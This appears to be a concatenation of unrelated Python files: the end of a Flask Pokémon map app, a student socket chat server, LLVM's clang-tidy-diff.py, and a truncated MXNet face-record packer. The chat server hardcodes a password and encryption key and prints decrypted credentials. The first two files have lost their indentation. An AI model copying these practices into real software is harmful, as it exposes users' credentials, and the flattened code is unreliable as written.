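#   register_background_thread(initial_registration=True)   # at startup, in the __main__ block
#   register_background_thread()                             # from main(), queues the next scan on a 30-second Timer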
def create_app():
app = Flask(__name__, template_folder='templates')
GoogleMaps(app, key=GOOGLEMAPS_KEY)
return app
app = create_app()
@app.route('/data')
def data():
""" Gets all the PokeMarkers via REST """
return json.dumps(get_pokemarkers())
@app.route('/raw_data')
def raw_data():
""" Gets raw data for pokemons/gyms/pokestops via REST """
return flask.jsonify(pokemons=pokemons, gyms=gyms, pokestops=pokestops)
@app.route('/config')
def config():
""" Gets the settings for the Google Maps via REST"""
center = {
'lat': FLOAT_LAT,
'lng': FLOAT_LONG,
'zoom': 15,
'identifier': "fullmap"
}
return json.dumps(center)
@app.route('/')
def fullmap():
clear_stale_pokemons()
return render_template(
'example_fullmap.html', key=GOOGLEMAPS_KEY, fullmap=get_map(), auto_refresh=auto_refresh)
@app.route('/next_loc')
def next_loc():
global NEXT_LAT, NEXT_LONG
lat = flask.request.args.get('lat', '')
lon = flask.request.args.get('lon', '')
if not (lat and lon):
print('[-] Invalid next location: %s,%s' % (lat, lon))
else:
print('[+] Saved next location as %s,%s' % (lat, lon))
NEXT_LAT = float(lat)
NEXT_LONG = float(lon)
return 'ok'
def get_pokemarkers():
pokeMarkers = [{
'icon': icons.dots.red,
'lat': origin_lat,
'lng': origin_lon,
'infobox': "Start position",
'type': 'custom',
'key': 'start-position',
'disappear_time': -1
}]
for pokemon_key in pokemons:
pokemon = pokemons[pokemon_key]
datestr = datetime.fromtimestamp(pokemon[
'disappear_time'])
dateoutput = datestr.strftime("%H:%M:%S")
print pokemon
if is_ampm_clock:
dateoutput = datestr.strftime("%I:%M%p").lstrip('0')
pokemon['disappear_time_formatted'] = dateoutput
LABEL_TMPL = u'''
<div><b>{name}</b><span> - </span><small><a href='http://www.pokemon.com/us/pokedex/{id}' target='_blank' title='View in Pokedex'>#{id}</a></small></div>
<div>Disappears at - {disappear_time_formatted} <span class='label-countdown' disappears-at='{disappear_time}'></span></div>
<div><a href='https://www.google.com/maps/dir/Current+Location/{lat},{lng}' target='_blank' title='View in Maps'>Get Directions</a></div>
'''
label = LABEL_TMPL.format(**pokemon)
# NOTE: `infobox` field doesn't render multiple line string in frontend
label = label.replace('\n', '')
pokeMarkers.append({
'type': 'pokemon',
'key': pokemon_key,
'disappear_time': pokemon['disappear_time'],
'icon': 'static/icons/%d.png' % pokemon["id"],
'lat': pokemon["lat"],
'lng': pokemon["lng"],
'infobox': label
})
for gym_key in gyms:
gym = gyms[gym_key]
if gym[0] == 0:
color = "rgba(0,0,0,.4)"
if gym[0] == 1:
color = "rgba(74, 138, 202, .6)"
if gym[0] == 2:
color = "rgba(240, 68, 58, .6)"
if gym[0] == 3:
color = "rgba(254, 217, 40, .6)"
icon = 'static/forts/'+numbertoteam[gym[0]]+'_large.png'
pokeMarkers.append({
'icon': 'static/forts/' + numbertoteam[gym[0]] + '.png',
'type': 'gym',
'key': gym_key,
'disappear_time': -1,
'lat': gym[1],
'lng': gym[2],
'infobox': "<div><center><small>Gym owned by:</small><br><b style='color:" + color + "'>Team " + numbertoteam[gym[0]] + "</b><br><img id='" + numbertoteam[gym[0]] + "' height='100px' src='"+icon+"'><br>Prestige: " + str(gym[3]) + "</center>"
})
for stop_key in pokestops:
stop = pokestops[stop_key]
if stop[2] > 0:
pokeMarkers.append({
'type': 'lured_stop',
'key': stop_key,
'disappear_time': -1,
'icon': 'static/forts/PstopLured.png',
'lat': stop[0],
'lng': stop[1],
'infobox': 'Lured Pokestop, expires at ' + stop[2],
})
else:
pokeMarkers.append({
'type': 'stop',
'key': stop_key,
'disappear_time': -1,
'icon': 'static/forts/Pstop.png',
'lat': stop[0],
'lng': stop[1],
'infobox': 'Pokestop',
})
return pokeMarkers
def get_map():
fullmap = Map(
identifier="fullmap2",
style='height:100%;width:100%;top:0;left:0;position:absolute;z-index:200;',
lat=origin_lat,
lng=origin_lon,
markers=get_pokemarkers(),
zoom='15', )
return fullmap
if __name__ == '__main__':
args = get_args()
register_background_thread(initial_registration=True)
app.run(debug=True, threaded=True, host=args.host, port=args.port)
|
ChatApplication_server.py
|
# -*- coding: utf-8 -*-
"""
Chat Room for Client Server Architecture.
University of the West of Scotland.
Author: Guillermo Siesto Sanchez B00334584
e-Mail: b00334684 at studentmail.uws.ac.uk
Date: 2018
Description: The purpose of this coursework is to develop a distributed chat
system without using any third-party networking library.
===========
S E R V E R
===========
"""
##
# Imports
##
import datetime
import logging # Generate a log file to record all the changes made
import socket
from sys import argv, stdout
import os # For exiting of every thread
import re
import threading # Threading
from simplecrypt import encrypt, decrypt # https://github.com/andrewcooke/simple-crypt
##
# Configuration of the log file
##
logging.basicConfig(level=logging.INFO,
filename='log/ChatApplication_server.log',
format='[%(levelname)s] %(asctime)s %(message)s', )
##
# Inicialization
##
host = '127.0.0.1'
buffer_size = 12800
n_connection = 100 # Number of possible connection
ftp_password = "ftpadmin"
active_connections = [] # User connected. [[username, grant, socket], ...
inactive_connections = [] # User inactive. [[username, grant, socket], ...
kick_connections = [] # Kicked users. [[username, grant, socket], ...
##
# lock
lock = threading.RLock()
def connect_client(client_sock, client_ip_and_port):
"""
First iteration between the client and the server.
The server will ask for the user's credentials, identifying whether the user
needs to be registered or logged in.
@param client_sock Raw socket introduced as a parameter.
@param client_ip_and_port A list of two slots with the ip and the port
of the client.
@exception if the connection with the socket is interrupted.
"""
client_sock.sendall('Connecting...\n')
print '] A client [{}] is trying to connect...'.format(client_ip_and_port)
client_ip = client_ip_and_port[0]
credential_response = ask_credentials(client_sock)
logging.info("User Login Info = {}".format(credential_response))
user_name = credential_response[1][1]
if (credential_response[0] == 'y'): # REGISTER
if (credential_response[1][0]):
print '] USER:%s with IP:%s has joined the room for the first time' % (credential_response[1][1], client_ip)
client_sock.sendall('<Server>: You have entered the room')
client_sock.sendall('================== < > ==================')
# Add to the active user list
user_data = [user_name, 1, client_sock]
with lock:
active_connections.append(user_data)
# Loop
open_connection(client_sock, user_name, 'l')
else:
print "ERROR 1 -> The username CAN'T exist in the database, try again"
client_sock.sendall("<Server>: ERROR 1 -> The username CAN'T exist in the database, try again")
connect_client(client_sock, client_ip_and_port)
elif (credential_response[0] == 'n'): # LOGIN
if (credential_response[1][0]):
            print '] USER:%s with IP:%s has joined the room' %(credential_response[1][1], client_ip)
client_sock.sendall('<Server>: Welcome back {} \n'.format(credential_response[1][1]))
client_sock.sendall('================== < > ==================')
# Add to the active user list
user_data = [user_name, get_user_grant(user_name), client_sock]
with lock:
active_connections.append(user_data)
# Loop
open_connection(client_sock, user_name, 'r')
else:
print "ERROR 2 -> The credentials are incorrect"
client_sock.sendall("<Server>: ERROR 2 -> The credentials are incorrect")
connect_client(client_sock, client_ip_and_port)
else:
        print '] USER:%s with IP:%s is having problems trying to connect. Please try again' %(credential_response[1][1], client_ip)
        client_sock.sendall('<Server>: There was a problem connecting. Please try again')
connect_client(client_sock, client_ip_and_port)
##
# Semi-infinite loop with the socket, waiting to communicate between client and server
def open_connection(client_sock, user_name, direction):
try:
currentDT = datetime.datetime.now()
for x in range(len(active_connections)):
            active_connections[x][2].sendall(currentDT.strftime("<\ %I:%M %p | ") + ' USER:%s has joined the room />' %(user_name))
while (get_socket_index(client_sock) != -1): # While exists
message = client_sock.recv(buffer_size)
msg = message
check_message(client_sock, user_name, msg)
    except Exception:
        if direction == 'r':
            print "] Exception when receiving on LOGIN"
        else:
            print "] Exception when receiving on REGISTER"
client_exit(client_sock)
print "\nSever down ==================\n"
os._exit(1)
##
# Asks the user for their credentials through the client socket.
#
# @param client_sock Raw socket introduced as a parameter
#
# @return a tuple with the information:
# [0] 'y' if the user wants to register / 'n' if the user wants to log in
# [1] the tuple returned by create_user(client_sock) when registering, or by
#     login_user(client_sock) when logging in: (success boolean, username)
def ask_credentials(client_sock):
try:
client_sock.sendall('<Server>: Do you want to create a new user? [y/n]')
response = client_sock.recv(buffer_size)
if (response == 'y'): # YES
return ('y', create_user(client_sock))
elif (response == 'n'): # NO
return ('n', login_user(client_sock))
else:
# Default
client_sock.sendall('<Server>: Error, you must respond with "y" saying yes or "n" saying no')
            return ask_credentials(client_sock)
    except Exception:
print "] Exception while asking credentials"
client_exit(client_sock)
print "\nSever down ==================\n"
os._exit(1)
##
# Create a user and save it in the credentials file. The server will ask the
# client for the credentials through the socket
#
# @param client_sock Raw socket introduced as a parameter
#
# @return A tuple with two elements:
# [0] Boolean telling whether the user could be created
# [1] String with the username
def create_user(client_sock):
client_sock.sendall('<Server>: (1/3) Write your user name:')
user_name = client_sock.recv(buffer_size)
client_sock.sendall('<Server>: (2/3) Write your password:')
user_password = client_sock.recv(buffer_size)
    client_sock.sendall('<Server>: (3/3) Repeat your password:')
user_password_2 = client_sock.recv(buffer_size)
with open('database/users_credentials.enc', 'r') as rDoc:
database_doc_list = decrypt_list(rDoc.read().split("+$&$&+"))
rDoc.close()
users = []
i = 0
while (i < len(database_doc_list)):
sublist = re.split('[;#]', database_doc_list[i])
users.append(sublist[0])
i = i + 1
answer = (False, user_name)
if (not(user_name in users)):
        if ((user_password == user_password_2)): # do the 2 passwords match?
with open('database/users_credentials.enc', 'a') as aDoc:
if (user_name == "Guille"): # Default admin
ciphertext = encrypt_txt(user_name + ';' + user_password + '#' + format(0))
else:
ciphertext = encrypt_txt(user_name + ';' + user_password + '#' + format(1))
aDoc.write(ciphertext + "+$&$&+")
aDoc.close()
            print '] %s has joined the party.\n' % user_name
answer = (True, user_name)
else:
            client_sock.sendall('<Server>: The passwords are not the same, please try again')
answer = (False, user_name)
else:
client_sock.sendall('<Server>: You must choose another username')
answer = (False, user_name)
return answer
##
# Encrypt txt
def encrypt_txt(p_text):
print ("Encrypting [0%]")
e_txt = encrypt("GSS", p_text.encode('utf8'))
print ("Encrypting [100%]")
return e_txt
##
# Decrypt list
def decrypt_list(p_list):
print "Encrypted list: " + format(p_list)
print ("Decrypting [0%]")
d_list = []
i = 0
while (i < len(p_list) and p_list[i] != ''):
        if (p_list[i] != '\n' and p_list[i] != ''): # If it's not an empty line in the doc
print "Let's append: " + format(p_list[i])
print "No encrypt: " + format(decrypt("GSS", p_list[i]))
d_list.append(decrypt("GSS", p_list[i]))
i = i + 1
print ("Decrypting [100%]")
print "LISTA:" + format(d_list)
return d_list
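##
# Illustrative helper (not part of the original flow): each credential record is
# stored as "username;password#grant" (grant 0 = admin, 1 = regular user),
# encrypted with simple-crypt and terminated by the "+$&$&+" separator. The
# values below are hypothetical and only show the expected round trip.
def _example_credential_roundtrip():
    record = 'alice;secret#1'              # hypothetical user with regular grant
    ciphertext = encrypt_txt(record)       # blob as written to users_credentials.enc
    return decrypt_list([ciphertext])[0] == record  # True if the round trip is lossless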
##
# Check if the password introduced as a parameter matches the user and
# password stored in the database file
def check_password(user_name, password):
answer = False
salir = False
with open('database/users_credentials.enc', 'r') as rDoc:
database_doc_list = decrypt_list(rDoc.read().split("+$&$&+"))
rDoc.close() # Close document
# Eliminate '\n' from our list
#database_doc_list = map(lambda each: each.strip("\n"), database_doc_list)
i = 0
while (i < len(database_doc_list) and (not salir)): # Working
print " LIST DATABASE: " + format(database_doc_list)
sublist = re.split('[;#]', database_doc_list[i])
print " SUBLIST: " + format(sublist)
if (user_name == sublist[0]):
if (password == sublist[1]):
answer = True
else:
salir = True
i = i + 1
return answer
##
# The user is asked to enter their credentials, which are then checked against
# the ones saved in the credentials file.
#
# @param: client_sock Raw socket
#
# @return: A tuple with a boolean telling whether the credentials were found in
# the file, and the username entered.
def login_user(client_sock):
client_sock.sendall('<Server>: Write your user name:')
user_name = client_sock.recv(buffer_size)
client_sock.sendall('<Server>: Write your password:')
user_password = client_sock.recv(buffer_size)
answer = (False, user_name)
with open('database/users_credentials.enc', 'r') as rDoc:
database_doc_list = decrypt_list(rDoc.read().split("+$&$&+"))
print "ENCRYPTED:" + format(rDoc.read().split("+$&$&+"))
rDoc.close() # Close the document
print "DESENCRYPTED:" + format(database_doc_list)
#database_doc_list = map(lambda each:each.strip("\n"), database_doc_list) # Eliminate '\n' from our list
i = 0
while (not answer[0] and i < len(database_doc_list)):
print " LIST DATABASEp: " + format(database_doc_list)
sublist = re.split('[; #]', database_doc_list[i]) # TODO GOOOD :)
print " SUBLISTp: " + format(sublist)
if (user_name == sublist[0] and (user_password == sublist[1])):
answer = (True, user_name)
else:
answer = (False, user_name)
i = i + 1
return answer
def client_exit(client_sock):
print "\n\n]---------ALL ACTIVE CONNECTIONS:---------\n"
print format(active_connections)
print "\n]-----------------------------------------\n\n"
print "] Disconnecting: " + format(active_connections[get_socket_index(client_sock)])
client_sock.sendall("<Server>: You are going to be disconnected by the server")
stdout.flush()
with lock:
client_sock.sendall(">disconnect")
with lock:
inactive_connections.append(active_connections[get_socket_index(client_sock)])
active_connections.pop(get_socket_index(client_sock))
print "\n\n]---------ALL ACTIVE CONNECTIONS:---------\n"
print format(active_connections)
print "\n]-----------------------------------------\n\n"
def clients_exit(client_sock):
stdout.flush()
    while len(active_connections) > 0:
        # client_exit removes the entry from active_connections,
        # so always disconnect the first remaining client
        client_exit(active_connections[0][2])
##
# Check if the message introduced as a parameter is a command (calling the
# specific method to handle it) or a regular message, which is broadcast to
# every connected client and printed on the server's command line
#
# @param user_name
# @param message
def check_message(client_sock, user_name, message):
if (message.startswith("/")):
print "] Checkeado init"
check_command(client_sock, user_name, message)
print "] Checkeado exit"
else:
currentDT = datetime.datetime.now()
# Print in every client screen
for x in range(len(active_connections)):
active_connections[x][2].sendall(currentDT.strftime("%I:%M %p | ") + user_name + ": " + message)
# Show in server side
print currentDT.strftime(" %I:%M %p | ") + user_name + ": " + message
##
# The message is checked when it starts with '/' (the command
# initialization character), and for each command the corresponding
# method is called
#
# @param message String with the text input
def check_command(client_sock, user_name, message):
msg = message
if msg.startswith("/viewusers"):
print "] %s solicit /viewusers" % user_name
print "================= ACTIVE CONNECTIONS"
print_list_client(client_sock, active_connections)
elif msg.startswith("/messageto"):
print "] %s solicit /messageto" % user_name
message_to(client_sock, message)
elif msg.startswith("/changepassword"):
print "] %s solicit /changepassword" % user_name
print "e changepassword"
elif msg.startswith("/busy"):
print "] %s solicit /busy" % user_name
client_sock.sendall(">busy")
elif msg.startswith("/free"):
print "] %s solicit /free" % user_name
client_sock.sendall(">free")
elif msg.startswith("/changegrant"):
print "] %s solicit /changegrant" % user_name
change_grant(client_sock, user_name, message)
elif msg.startswith("/kickuser"):
print "] %s solicit /kickuser" % user_name
kick_user(client_sock, message)
elif msg.startswith("/viewkickusers"):
print "] %s solicit /viewkickusers" % user_name
print "================= KICK CONNECTIONS"
print_list_client(client_sock, kick_connections)
elif msg.startswith("/restart"):
print "] %s solicit /restart" % user_name
clients_exit(client_sock)
os._exit(1)
elif msg.startswith("/disconnect"):
print "] %s solicit /disconnect" % user_name
client_exit(client_sock)
elif msg.startswith("/help"):
print "] %s solicit /help" % user_name
client_sock.sendall("You can type:\n /viewusers\n /messageto (username) (message)\n /busy\n /free\n /changegrant (username) (0/1)\n /kickuser (username)\n /viewkickusers\n /restart\n /disconnect")
else:
print "] %s solicit couldm't be resolved. Non existing commands" % user_name
client_sock.sendall("<Server>: [Error typing] Type '/help' see all possible commands")
def message_to(client_sock, message):
sublist = re.split(' ', message) # It will end as ['/messageto', 'username', 'whatever', ...]
index = get_user_index(sublist[1])
if (index != -1):
del sublist[0] # Remove command
print "] PM from: " + sublist[0] + "\n] <Message>"
print ' '.join(sublist)
active_connections[index][2].sendall("] PM from: " + sublist[0] + "\n] <Message>")
del sublist[0] # Remove user_name
print ' '.join(sublist) + "\n] <End of message>"
active_connections[index][2].sendall(' '.join(sublist) + "\n] <End of message>")
else:
client_sock.sendall("Error 3 -> User not found")
def kick_user(client_sock, message):
sublist = re.split(' ', message) # It will end as ['/kickuser', 'username', 'whatever', ...]
index = get_user_index(sublist[1])
if (index != -1):
if (active_connections[get_socket_index(client_sock)][1] == 0): # Only if the origin user is a superuser
active_connections[index][2].sendall(">kick")
user_data = [active_connections[index][0], active_connections[index][1], active_connections[index][2]] # Add to kick list
kick_connections.append(user_data)
client_sock.sendall("================= KICK CONNECTIONS")
print_list_client(client_sock, kick_connections)
client_exit(active_connections[index][2])
else:
client_sock.sendall("Error 3 -> You don't have the grant to make that operation")
else:
client_sock.sendall("Error 4 -> User not found")
def change_grant(client_sock, user_name, message):
    # message = command + " " + user_target + " " + grant
possible = False
if (get_user_grant(user_name) == 0): # If the solicitor is superuser
msg_splited = re.split('[" "]', message)
possible = set_user_grant(msg_splited[1], msg_splited[2])
client_sock.sendall(msg_splited[0] + " " + msg_splited[2])
else:
client_sock.sendall("] You have no grant to make that operation")
return possible
def get_user_grant(user_name):
print "] Get_user_grant"
with open('database/users_credentials.enc', 'r') as rDoc:
database_doc_list = decrypt_list(rDoc.read().split("+$&$&+"))
rDoc.close() # Closing document
#database_doc_list = map(lambda each: each.strip("\n"), database_doc_list) # Eliminate '\n'
grant = -1
i = 0
while ((i < len(database_doc_list)) and (grant < 0)): # Working
sublist = re.split('[;#]', database_doc_list[i])
if (user_name == sublist[0]):
grant = int(sublist[2])
i = i + 1
print "GRANT: " + format(grant)
return grant
def set_user_grant(user_name, new_grant):
print "] Get_user_grant"
# READING
with open('database/users_credentials.enc', 'r') as rDoc:
database_doc_list = decrypt_list(rDoc.read().split("+$&$&+"))
rDoc.close() # Closing document
#database_doc_list = map(lambda each: each.strip("\n"), database_doc_list) # Eliminate '\n'
found = False
i = 0
index_parent_list = 0
while ((i < len(database_doc_list)) and (not found)): # Working
sublist = re.split('[;#]', database_doc_list[i])
if (user_name == sublist[0]):
index_parent_list = i
found = True
user_data = [user_name, sublist[1], new_grant]
i = i + 1
# WRITING If found
if (found):
        # Add the updated line
        database_doc_list.append(user_data[0] + ';' + user_data[1] + '#' + user_data[2])
        # Delete the old line
        database_doc_list.pop(index_parent_list)
with open('database/users_credentials.enc', 'w') as wDoc:
for line in database_doc_list:
ciphertext = encrypt_txt(line)
wDoc.write(ciphertext + "+$&$&+")
wDoc.close()
    return found # Tells whether the user was found
##
# Will search in the active_connections list to look for the appearance of
# the username
#
# @param: user_name
#
# @Return: (-1) if not found, (position) if found
def get_user_index(user_name):
i = 0
encontrado = False
while (i < len(active_connections) and (not encontrado)):
if (user_name == active_connections[i][0]):
encontrado = True
else:
i = i + 1
if encontrado:
return i
else:
return -1
def get_socket_index(socket):
i = 0
encontrado = False
while (i < len(active_connections) and (not encontrado)):
if (socket == active_connections[i][2]):
encontrado = True
else:
i = i + 1
if encontrado:
return i
else:
return -1
##
# Print a list in a formatted way
#
# @param list The list to print to the client
def print_list_client(client_sock, list):
client_sock.sendall("\n\n---------------------------------\n")
client_sock.sendall(" N | User | Grant \n")
i = 0
while (i < len(list)):
client_sock.sendall(" " + format(i) + " | " + format(list[i][0]) + " | " + format(list[i][1]) + "\n")
i = i + 1
client_sock.sendall("---------------------------------\n\n")
##
# Main
def main(argv):
server_port = 9797
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((host, server_port))
sock.listen(n_connection)
print '] Server on port ' + str(server_port)
logging.info("Server on port {}".format(server_port))
stdout.flush() # Clean
try:
while 1:
client_connection, addr = sock.accept()
print '] Client connected on ' + str(addr[0]) + ':' + str(addr[1]) + '\n'
logging.info("Chat Client Connected on IP {} & Port {}".format(host, server_port))
stdout.flush() # Clean
            # THREADING
server_t = threading.Thread(target=connect_client, args=(client_connection, addr))
server_t.start()
except (KeyboardInterrupt, SystemExit):
stdout.flush()
# For every ip we must close the socket
clients_exit(sock)
print "\nSever down ==================\n"
os._exit(1)
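##
# Illustrative sketch (not the real chat client): opens a raw socket to the
# server above, reads the first banner and disconnects. Host and buffer size
# reuse the module defaults; the port matches the one hard-coded in main().
def _example_probe_server():
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.connect((host, 9797))
    banner = probe.recv(buffer_size)  # "Connecting...\n" sent by connect_client()
    probe.close()
    return banner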
main(argv)
|
clang-tidy-diff.py
|
#!/usr/bin/env python3
#
#===- clang-tidy-diff.py - ClangTidy Diff Checker ------------*- python -*--===#
#
# Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
#
#===------------------------------------------------------------------------===#
r"""
ClangTidy Diff Checker
======================
This script reads input from a unified diff, runs clang-tidy on all changed
files and outputs clang-tidy warnings in changed lines only. This is useful to
detect clang-tidy regressions in the lines touched by a specific patch.
Example usage for git/svn users:
git diff -U0 HEAD^ | clang-tidy-diff.py -p1
svn diff --diff-cmd=diff -x-U0 | \
clang-tidy-diff.py -fix -checks=-*,modernize-use-override
"""
import argparse
import glob
import json
import multiprocessing
import os
import re
import shutil
import subprocess
import sys
import tempfile
import threading
import traceback
try:
import yaml
except ImportError:
yaml = None
is_py2 = sys.version[0] == '2'
if is_py2:
import Queue as queue
else:
import queue as queue
def run_tidy(task_queue, lock, timeout):
watchdog = None
while True:
command = task_queue.get()
try:
proc = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if timeout is not None:
watchdog = threading.Timer(timeout, proc.kill)
watchdog.start()
stdout, stderr = proc.communicate()
with lock:
sys.stdout.write(stdout.decode('utf-8') + '\n')
sys.stdout.flush()
if stderr:
sys.stderr.write(stderr.decode('utf-8') + '\n')
sys.stderr.flush()
except Exception as e:
with lock:
sys.stderr.write('Failed: ' + str(e) + ': '.join(command) + '\n')
finally:
with lock:
if (not timeout is None) and (not watchdog is None):
if not watchdog.is_alive():
sys.stderr.write('Terminated by timeout: ' +
' '.join(command) + '\n')
watchdog.cancel()
task_queue.task_done()
def start_workers(max_tasks, tidy_caller, task_queue, lock, timeout):
for _ in range(max_tasks):
t = threading.Thread(target=tidy_caller, args=(task_queue, lock, timeout))
t.daemon = True
t.start()
def merge_replacement_files(tmpdir, mergefile):
"""Merge all replacement files in a directory into a single file"""
# The fixes suggested by clang-tidy >= 4.0.0 are given under
# the top level key 'Diagnostics' in the output yaml files
mergekey = "Diagnostics"
merged = []
for replacefile in glob.iglob(os.path.join(tmpdir, '*.yaml')):
content = yaml.safe_load(open(replacefile, 'r'))
if not content:
continue # Skip empty files.
merged.extend(content.get(mergekey, []))
if merged:
# MainSourceFile: The key is required by the definition inside
# include/clang/Tooling/ReplacementsYaml.h, but the value
# is actually never used inside clang-apply-replacements,
# so we set it to '' here.
output = { 'MainSourceFile': '', mergekey: merged }
with open(mergefile, 'w') as out:
yaml.safe_dump(output, out)
else:
# Empty the file:
open(mergefile, 'w').close()
def main():
parser = argparse.ArgumentParser(description=
'Run clang-tidy against changed files, and '
'output diagnostics only for modified '
'lines.')
parser.add_argument('-clang-tidy-binary', metavar='PATH',
default='clang-tidy',
help='path to clang-tidy binary')
parser.add_argument('-p', metavar='NUM', default=0,
help='strip the smallest prefix containing P slashes')
parser.add_argument('-regex', metavar='PATTERN', default=None,
help='custom pattern selecting file paths to check '
'(case sensitive, overrides -iregex)')
parser.add_argument('-iregex', metavar='PATTERN', default=
r'.*\.(cpp|cc|c\+\+|cxx|c|cl|h|hpp|m|mm|inc)',
help='custom pattern selecting file paths to check '
'(case insensitive, overridden by -regex)')
parser.add_argument('-j', type=int, default=1,
help='number of tidy instances to be run in parallel.')
parser.add_argument('-timeout', type=int, default=None,
help='timeout per each file in seconds.')
parser.add_argument('-fix', action='store_true', default=False,
help='apply suggested fixes')
parser.add_argument('-checks',
help='checks filter, when not specified, use clang-tidy '
'default',
default='')
parser.add_argument('-path', dest='build_path',
help='Path used to read a compile command database.')
parser.add_argument('-vfsoverlay', dest='vfsoverlay', metavar='VFSFILE',
help='Specified a VFS overlay configuration file')
if yaml:
parser.add_argument('-export-fixes', metavar='FILE', dest='export_fixes',
help='Create a yaml file to store suggested fixes in, '
'which can be applied with clang-apply-replacements.')
parser.add_argument('-extra-arg', dest='extra_arg',
action='append', default=[],
help='Additional argument to append to the compiler '
'command line.')
parser.add_argument('-extra-arg-before', dest='extra_arg_before',
action='append', default=[],
help='Additional argument to prepend to the compiler '
'command line.')
parser.add_argument('-quiet', action='store_true', default=False,
help='Run clang-tidy in quiet mode')
clang_tidy_args = []
argv = sys.argv[1:]
if '--' in argv:
clang_tidy_args.extend(argv[argv.index('--'):])
argv = argv[:argv.index('--')]
args = parser.parse_args(argv)
# Extract changed lines for each file.
filename = None
lines_by_file = {}
for line in sys.stdin:
match = re.search('^\+\+\+\ \"?(.*?/){%s}([^ \t\n\"]*)' % args.p, line)
if match:
filename = match.group(2)
if filename is None:
continue
if args.regex is not None:
if not re.match('^%s$' % args.regex, filename):
continue
else:
if not re.match('^%s$' % args.iregex, filename, re.IGNORECASE):
continue
match = re.search('^@@.*\+(\d+)(,(\d+))?', line)
if match:
start_line = int(match.group(1))
line_count = 1
if match.group(3):
line_count = int(match.group(3))
if line_count == 0:
continue
end_line = start_line + line_count - 1
lines_by_file.setdefault(filename, []).append([start_line, end_line])
if not any(lines_by_file):
print("No relevant changes found.")
sys.exit(0)
max_task_count = args.j
if max_task_count == 0:
max_task_count = multiprocessing.cpu_count()
max_task_count = min(len(lines_by_file), max_task_count)
tmpdir = None
if yaml and args.export_fixes:
tmpdir = tempfile.mkdtemp()
# Tasks for clang-tidy.
task_queue = queue.Queue(max_task_count)
# A lock for console output.
lock = threading.Lock()
# Run a pool of clang-tidy workers.
start_workers(max_task_count, run_tidy, task_queue, lock, args.timeout)
# Form the common args list.
common_clang_tidy_args = []
if args.fix:
common_clang_tidy_args.append('-fix')
if args.checks != '':
common_clang_tidy_args.append('-checks=' + args.checks)
if args.quiet:
common_clang_tidy_args.append('-quiet')
if args.build_path is not None:
common_clang_tidy_args.append('-p=%s' % args.build_path)
if args.vfsoverlay is not None:
common_clang_tidy_args.append('--vfsoverlay=%s' % args.vfsoverlay)
for arg in args.extra_arg:
common_clang_tidy_args.append('-extra-arg=%s' % arg)
for arg in args.extra_arg_before:
common_clang_tidy_args.append('-extra-arg-before=%s' % arg)
for name in lines_by_file:
line_filter_json = json.dumps(
[{"name": name, "lines": lines_by_file[name]}],
separators=(',', ':'))
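    # Example (hypothetical diff): changed lines 10-12 and 40 of foo.cpp yield
    #   -line-filter=[{"name":"foo.cpp","lines":[[10,12],[40,40]]}]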
# Run clang-tidy on files containing changes.
command = [args.clang_tidy_binary]
command.append('-line-filter=' + line_filter_json)
if yaml and args.export_fixes:
# Get a temporary file. We immediately close the handle so clang-tidy can
# overwrite it.
(handle, tmp_name) = tempfile.mkstemp(suffix='.yaml', dir=tmpdir)
os.close(handle)
command.append('-export-fixes=' + tmp_name)
command.extend(common_clang_tidy_args)
command.append(name)
command.extend(clang_tidy_args)
task_queue.put(command)
# Wait for all threads to be done.
task_queue.join()
if yaml and args.export_fixes:
print('Writing fixes to ' + args.export_fixes + ' ...')
try:
merge_replacement_files(tmpdir, args.export_fixes)
except:
sys.stderr.write('Error exporting fixes.\n')
traceback.print_exc()
if tmpdir:
shutil.rmtree(tmpdir)
if __name__ == '__main__':
main()
|
face2rec2.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
#curr_path = os.path.abspath(os.path.dirname(__file__))
#sys.path.append(os.path.join(curr_path, "../python"))
import mxnet as mx
import random
import argparse
import cv2
import time
import traceback
#from builtins import range
from easydict import EasyDict as edict
sys.path.append(os.path.join(os.path.dirname(__file__), 'common'))
import face_preprocess
import face_image
try:
import multiprocessing
except ImportError:
multiprocessing = None
def read_list(path_in):
with open(path_in) as fin:
identities = []
last = [-1, -1]
_id = 1
while True:
line = fin.readline()
if not line:
break
item = edict()
item.flag = 0
item.image_path, label, item.bbox, item.landmark, item.aligned = face_preprocess.parse_lst_line(line)
if not item.aligned and item.landmark is None:
#print('ignore line', line)
continue
item.id = _id
item.label = [label, item.aligned]
yield item
if label!=last[0]:
if last[1]>=0:
identities.append( (last[1], _id) )
last[0] = label
last[1] = _id
_id+=1
identities.append( (last[1], _id) )
item = edict()
item.flag = 2
item.id = 0
item.label = [float(_id), float(_id+len(identities))]
yield item
for identity in identities:
item = edict()
item.flag = 2
item.id = _id
_id+=1
item.label = [float(identity[0]), float(identity[1])]
yield item
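# read_list() yields one edict per usable face line (flag 0, label =
# [identity label, aligned flag]); unaligned entries without landmarks are
# skipped. It then yields one flag-2 header item whose label is the id range
# occupied by the identity records, followed by one flag-2 record per identity
# whose label is that identity's [first_image_id, end_image_id) range.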
def image_encode(args, i, item, q_out):
oitem = [item.id]
#print('flag', item.flag)
if item.flag==0:
fullpath = item.image_path
header = mx.recordio.IRHeader(item.flag, item.label, item.id, 0)
#print('write', item.flag, item.id, item.label)
if item.aligned:
with open(fullpath, 'rb') as fin:
img = fin.read()
s = mx.recordio.pack(header, img)
q_out.put((i, s, oitem))
else:
img = cv2.imread(fullpath, args.color)
assert item.landmark is not None
img = face_preprocess.preprocess(img, bbox = item.bbox, landmark=item.landmark, image_size='%d,%d'%(args.image_h, args.image_w))
s = mx.recordio.pack_img(header, img, quality=args.quality, img_fmt=args.encoding)
q_out.put((i, s, oitem))
else:
header = mx.recordio.IRHeader(item.flag, item.label, item.id, 0)
